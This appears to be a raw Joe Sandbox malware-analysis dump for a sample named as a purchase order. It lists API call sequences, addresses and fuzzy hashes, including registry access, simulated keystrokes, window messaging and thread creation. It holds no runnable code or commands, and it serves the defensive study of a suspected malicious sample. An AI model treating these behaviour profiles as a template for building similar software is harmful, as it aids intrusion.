                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
                                                            • String ID:
                                                            • API String ID: 1457242333-0
                                                            • Opcode ID: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                            • Instruction ID: 469fbb3f3db71b9324cb07d082b932f31bc4dcc79b85a5821822f518eef070f3
                                                            • Opcode Fuzzy Hash: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                            • Instruction Fuzzy Hash: 0BB19F71600619EFEB14CF68C984BAFBBF1FF48301F15851AEA5597280D738BA61CB54
                                                            APIs
                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: ConnectRegistry_memmove_wcslen
                                                            • String ID:
                                                            • API String ID: 15295421-0
                                                            • Opcode ID: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                            • Instruction ID: 8aea567fc0405534ed4901798b67d501f7e0ea7b8d3e81485b6dc33093e60a2a
                                                            • Opcode Fuzzy Hash: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                            • Instruction Fuzzy Hash: 96A170B12043019FD710EF65CC85B1BB7E8EF85304F14892EF6859B291DB78E945CB9A
                                                            APIs
                                                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                            • _wcstok.LIBCMT ref: 004675B2
                                                              • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                            • _wcscpy.LIBCMT ref: 00467641
                                                            • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                            • _wcslen.LIBCMT ref: 00467793
                                                            • _wcslen.LIBCMT ref: 004677BD
                                                              • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                            • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$FileName_memmove$OpenSave__getptd_wcscpy_wcstok
                                                            • String ID: X
                                                            • API String ID: 780548581-3081909835
                                                            • Opcode ID: d2e7fab411aea0598dfd2bf5d0f156e5f0b1b051b12d5a137b82cd3b72d64586
                                                            • Instruction ID: 4d78316a312392ccd7929e5b9cc6f9f998d70627324fd0ae594e8e4bf7546d1d
                                                            • Opcode Fuzzy Hash: d2e7fab411aea0598dfd2bf5d0f156e5f0b1b051b12d5a137b82cd3b72d64586
                                                            • Instruction Fuzzy Hash: 1381A3315083008FD310EF65C985A5FB7E5AF84318F108A2FF599572A1EB78ED46CB9A
                                                            APIs
                                                              • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                              • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                              • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                              • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                              • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                            • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
                                                            • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
                                                            • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
                                                            • LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
                                                            • CloseFigure.GDI32(?), ref: 0044751F
                                                            • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
                                                            • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                            • String ID:
                                                            • API String ID: 4082120231-0
                                                            • Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                            • Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
                                                            • Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                            • Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5
                                                            APIs
                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
                                                            • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
                                                            • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
                                                            • RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
                                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
                                                            • RegCloseKey.ADVAPI32(?), ref: 0046B49D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
                                                            • String ID:
                                                            • API String ID: 2027346449-0
                                                            • Opcode ID: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                                            • Instruction ID: e744fe3a0f0af3658e2b80b3541497a384b181c150b1b14c88f03688e4e42502
                                                            • Opcode Fuzzy Hash: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                                            • Instruction Fuzzy Hash: 92613D71218301ABD304EF65C985E6BB7A8FFC8704F008A2EF945D7281DB75E945CBA6
                                                            APIs
                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                              • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                            • GetMenu.USER32 ref: 0047A703
                                                            • GetMenuItemCount.USER32(00000000), ref: 0047A74F
                                                            • GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
                                                            • _wcslen.LIBCMT ref: 0047A79E
                                                            • GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
                                                            • GetSubMenu.USER32(00000000,?), ref: 0047A7F2
                                                            • PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
                                                            Similarity
                                                            • API ID: Menu$Item$CountMessagePostStringWindow_malloc_wcslen
                                                            • String ID:
                                                            • API String ID: 3257027151-0
                                                            • Opcode ID: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                                                            • Instruction ID: 02f8ada5611b6a2978ded3aa89f74167ce8c021908d800e5e23178b580333db3
                                                            • Opcode Fuzzy Hash: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                                                            • Instruction Fuzzy Hash: AA51FA71504301ABD310EF25DC81B9FB7E8FF88314F108A2EF989A7241D779E95487A6
                                                            APIs
                                                            • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
                                                            Similarity
                                                            • API ID: ErrorLastselect
                                                            • String ID:
                                                            • API String ID: 215497628-0
                                                            • Opcode ID: 1468281f9cf0934abd1b1669512be34cf69b73f31855631c1820efa4222e7528
                                                            • Instruction ID: fadcceb5308e48970113ceaff65c18732520a09434288b0a98514d96d8681c7b
                                                            • Opcode Fuzzy Hash: 1468281f9cf0934abd1b1669512be34cf69b73f31855631c1820efa4222e7528
                                                            • Instruction Fuzzy Hash: 65510772E001046BD710EF69DC85FAEB3A8EB94320F14856EF905D7381EA35DD41C7A5
                                                            APIs
                                                            • GetParent.USER32(?), ref: 0044443B
                                                            • GetKeyboardState.USER32(?), ref: 00444450
                                                            • SetKeyboardState.USER32(?), ref: 004444A4
                                                            • PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
                                                            • PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
                                                            • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
                                                            • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
                                                            Similarity
                                                            • API ID: MessagePost$KeyboardState$Parent
                                                            • String ID:
                                                            • API String ID: 87235514-0
                                                            • Opcode ID: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                            • Instruction ID: 8f44bbd55e3387c5fecf3766ecc31f273ddc6601011f0052083f6d8a5cbafb33
                                                            • Opcode Fuzzy Hash: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                            • Instruction Fuzzy Hash: 2051D6A05047D53AFB3682748846BA7BFE42F86704F08868BE1D5559C3D3ECE994CB68
                                                            APIs
                                                            • GetParent.USER32(?), ref: 00444633
                                                            • GetKeyboardState.USER32(?), ref: 00444648
                                                            • SetKeyboardState.USER32(?), ref: 0044469C
                                                            • PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
                                                            • PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
                                                            • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
                                                            • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
                                                            Similarity
                                                            • API ID: MessagePost$KeyboardState$Parent
                                                            • String ID:
                                                            • API String ID: 87235514-0
                                                            • Opcode ID: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                            • Instruction ID: 3b822c4357a53f38689f34ecdfb8cd013e642acfd09065eaf4f6fa9230d15588
                                                            • Opcode Fuzzy Hash: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                            • Instruction Fuzzy Hash: 7451D4B05047D139F73692688C45BA7BFD86B8B304F08868FF1D5156C2D3ACB895CB69
                                                            APIs
                                                            • SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
                                                            • ImageList_Remove.COMCTL32(?,?), ref: 004553D3
                                                            • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
                                                            • DeleteObject.GDI32(?), ref: 00455736
                                                            • DeleteObject.GDI32(?), ref: 00455744
                                                            • DestroyIcon.USER32(?), ref: 00455752
                                                            • DestroyWindow.USER32(?), ref: 00455760
                                                            Similarity
                                                            • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                                            • String ID:
                                                            • API String ID: 2354583917-0
                                                            • Opcode ID: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                            • Instruction ID: c6eb43681ca9132c11a6020d2ba108f27148fdc9c8ef1f50c91adec3b3f4716e
                                                            • Opcode Fuzzy Hash: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                            • Instruction Fuzzy Hash: 76516B74204A419FC714DF24C4A4BB677F5FF8A302F1486AAED998B392D738A849CB54
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                            • Instruction ID: 5d193f65ffce5f3a1406795a0d9a37a93f2f4887bdc9b14e5c8c629f49d9966a
                                                            • Opcode Fuzzy Hash: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                            • Instruction Fuzzy Hash: 0A413871900114ABE710DF58CC84FAF7765EB46320F14826EF858AB3C1C7745D02EB98
                                                            APIs
                                                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
                                                            • SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
                                                            • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                            • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                            • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                            • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                            • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                            Similarity
                                                            • API ID: Window$Enable$Show$MessageMoveSend
                                                            • String ID:
                                                            • API String ID: 896007046-0
                                                            • Opcode ID: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                            • Instruction ID: 578be1c3660e2fd518c7beccd973f741d6ce186f3db94e5441c29ef1e5fc56da
                                                            • Opcode Fuzzy Hash: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                            • Instruction Fuzzy Hash: 5F419D742003809FF724DB24C894BAB77E0FF96305F18446EF5859B291DB78A845CB59
                                                            APIs
                                                            • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448AC9
                                                            • GetFocus.USER32 ref: 00448ACF
                                                            • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                            • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                            • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                            • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                            • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                            Similarity
                                                            • API ID: Window$Enable$Show$FocusMessageSend
                                                            • String ID:
                                                            • API String ID: 3429747543-0
                                                            • Opcode ID: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                            • Instruction ID: 6f3afe48a64986b2df7f4b22be5166ca64fe0b5af1f2aee4406df3dc20f3ce1d
                                                            • Opcode Fuzzy Hash: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                            • Instruction Fuzzy Hash: F331C4706043805BF7248F24CCC8BAFB7D4FB95305F08491EF581A6291DBBCA845CB59
                                                            APIs
                                                              • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
                                                              • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
                                                              • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                            • KillTimer.USER32(?,?,?,?,?), ref: 004012D3
                                                            • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
                                                            • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
                                                            • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
                                                            • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
                                                            Similarity
                                                            • API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
                                                            • String ID:
                                                            • API String ID: 3300667738-0
                                                            • Opcode ID: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                                                            • Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
                                                            • Opcode Fuzzy Hash: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                                                            • Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D459
                                                            • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
                                                            • __swprintf.LIBCMT ref: 0045D4E9
                                                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$InformationVolume__swprintf
                                                            • String ID: %lu$\VH
                                                            • API String ID: 3164766367-2432546070
                                                            • Opcode ID: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                            • Instruction ID: a5bcfc38f1a54d16d783223dfbe865d4bc924dff4e6617147b97584b2165572c
                                                            • Opcode Fuzzy Hash: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                            • Instruction Fuzzy Hash: 11317171A00209AFCB14EF95DD85EAEB7B8FF48304F1084AAF905A7291D774EA45CB94
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
                                                            • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
                                                            • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
                                                            • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
                                                            • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: Msctls_Progress32
                                                            • API String ID: 3850602802-3636473452
                                                            • Opcode ID: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                            • Instruction ID: 3e9a69ee1b5e3cb2ffa50bc712587bba9ef5757239c838e11c91c46d95a842ac
                                                            • Opcode Fuzzy Hash: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                            • Instruction Fuzzy Hash: 7A21667135030477EB20DEA9DC82F97B3AD9F94B24F21460AFB54A72D1C5B5F8418B58
                                                            APIs
                                                            • _malloc.LIBCMT ref: 0041F707
                                                              • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                              • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                              • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                            • _free.LIBCMT ref: 0041F71A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap_free_malloc
                                                            • String ID: [B
                                                            • API String ID: 1020059152-632041663
                                                            • Opcode ID: 5ae3695c4899d33c0c5016eec090c96391fe5f6cd2bec6778d3ea2d81492c429
                                                            • Instruction ID: 066e14217b5799beb7557260d36092b09813ce611e9d099bbd870b86b34de80c
                                                            • Opcode Fuzzy Hash: 5ae3695c4899d33c0c5016eec090c96391fe5f6cd2bec6778d3ea2d81492c429
                                                            • Instruction Fuzzy Hash: 0211EB32454615AACB213F75EC086DB3BA49F443A5B20053BF824CA2D1DB7C88C7C7AC
                                                            APIs
                                                            • ___set_flsgetvalue.LIBCMT ref: 00413DA4
                                                            • __calloc_crt.LIBCMT ref: 00413DB0
                                                            • __getptd.LIBCMT ref: 00413DBD
                                                            • CreateThread.KERNEL32(?,?,00413D1A,00000000,?,?), ref: 00413DF4
                                                            • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00413DFE
                                                            • _free.LIBCMT ref: 00413E07
                                                            • __dosmaperr.LIBCMT ref: 00413E12
                                                              • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                            • String ID:
                                                            • API String ID: 155776804-0
                                                            • Opcode ID: 2348856d60b5f8ae92a3c52096df9563f03509e61ea6f3f8618797eae5d9925f
                                                            • Instruction ID: a8fa495ec3ad1bcc0d525816251f0ff308f4c172cb7463a6c3574dd724ca7d0d
                                                            • Opcode Fuzzy Hash: 2348856d60b5f8ae92a3c52096df9563f03509e61ea6f3f8618797eae5d9925f
                                                            • Instruction Fuzzy Hash: 8E11E9321087066FD7107FA6DC459DB3BE8DF04775B20042FF91586292DB79D99186AC
                                                            APIs
                                                              • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
                                                              • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
                                                            • GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
                                                            • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
                                                            • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
                                                            • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
                                                            • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                            • String ID:
                                                            • API String ID: 1957940570-0
